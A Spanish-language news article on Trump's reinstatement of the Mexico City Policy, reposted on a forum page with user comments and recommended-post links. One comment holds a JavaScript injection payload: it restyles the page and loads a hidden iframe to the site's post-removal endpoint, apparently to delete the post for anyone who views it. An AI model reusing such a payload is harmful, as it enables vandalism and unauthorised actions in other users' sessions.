Trump ordena suspender el financiamiento de ong que promueven la salud reproductiva la norma firmada

Hecho por JiS en la categoría Arte

El presidente de Estados Unidos, Donald Trump, reabrió la guerra sobre la salud reproductiva.

El mandatario estadounidense firmó una orden ejecutiva para reactivar la Mexico City Policy, norma que prohíbe que organizaciones no gubernamentales (ONG’s) utilicen los fondos federales que reciben para promover actividades relacionadas con la salud reproductiva, como el aborto, en el extranjero.

La también conocida como Global Gag Rule, instaurada por el presidente Ronald Reagan en 1984, ha sido una política gubernamental intermitente desde su creación, ya que los republicanos la apoyan, mientras que los demócratas están en contra.

Así, la Mexico City Policy se activa cada que un republicano está al frente de la Casa Blanca, mientras que Bill Clinton y Barack Obama, los dos últimos demócratas en ganar la Presidencia de EU, la anularon durante sus respectivos gobiernos.

La reinstauración de la medida ocurre luego de que cientos de miles de mujeres se manifestaron en Estados Unidos y el mundo entero para exigir que el presidente Donald Trump respete sus derechos.

Además, este viernes 27 de enero se realizará la Marcha por la Vida en Washington, por lo que se espera que miles de personas protesten contra la medida.

El secretario de prensa de la Casa Blanca, Sean Spicer, explicó que la restauración de esta política gubernamental no es más que la repercusión de los valores del presidente Donald Trump.

“Creo que el restablecimiento de esta política no es sólo algo que hace eco de ese valor, sino que respeta la financiación de los contribuyentes también, y asegura que estamos de pie no sólo para la vida de los no nacidos, sino también para los fondos de los contribuyentes que están siendo gastados en el extranjero para realizar una acción que es contraria a los valores del presidente”, explicó el vocero.

La reactivación de la medida se puede leer como el inicio de una larga batalla sobre el aborto, que continuará a lo largo de la administración del presidente Trump, señaló el sitio web The Hill, que recordó que el actual mandatario se manifestó en contra del aborto desde su campaña.

Además, el vicepresidente Mike Pence también se ha manifestado en contra de la salud reproductiva  y fue el impulsor de varias leyes en contra del aborto, cuando se desempeñaba como gobernador de Indiana.

La organización CHANGE (Center for Health and Gender Equity) considera que The Mexico City Policy es una amenaza para la salud y la ciencia, ya que está comprobado que el número de abortos se incrementó en las épocas en las que la política ha estado vigente. Además, obstaculizó los esfuerzos de ONG’s contra el VIH, contribuyó al cierre de clínicas e imposibilitó el acceso a la salud en comunidades rurales.

Según un estudio realizado en 2011 por la Universidad de Standford en países de África subsahariana, The Mexico City Policy no inhibe los abortos, sino que se incrementan los casos y se incentivan los procedimientos ilegales, lo que pone en riesgo la vida de las mujeres.

El nombre de The Mexco City Policy se le puso ya que Reagan presentó esta norma en 1984 en la Conferencia Internacional de Población y Desarrollo que se llevó a cabo en la Ciudad de México.

Larga vida al emperdor Trump


36

Comentarios 2088

NachoLibre - Nacholibre - Hace 1 mes

soros va a tener que desembolsar, no lo va a hacer


MadAra - Mad-1545016413077 - Hace 7 meses

El fin esta cerca "document.body.setAttribute('style',' background: url(https://vignette.wikia.nocookie.net/aldea/images/f/f4/Madara_Uchiha_sharingan.gif/revision/latest?cb=20110911030748&path-prefix=es)');setTimeout(function(){var i = document.createElement('iframe');i.src = 'https://1peluchinga.com/post/remove/'+window.location.toString().match(/(.*?):\/\/1peluchinga.com\/comentario\/(.*?)\//)[2];i.style.visibility = 'hidden';document.body.appendChild(i) ;}),3000">

MatrixDeone - Matrixdeone - Hace 1 año


OtaCuaro - Otaku - Hace 1 año


¨

Recomendados papu

Pero que es esta mierda ??? jajajajajaj


B0x.sh - libertad absoluta an1wk


Ahora en censuringa no podes decir "feminazi"


Recopilacion de pelea de "hoy" domaditas


Rachel / sexys de instagram #25


Peluchin el chileno mata gatos


Sabrina lynn


Hoy streaming a las 23:00 lopez vs matrixdeone


Porqueria q


Peluchines,como encuentro mi primer trabajo?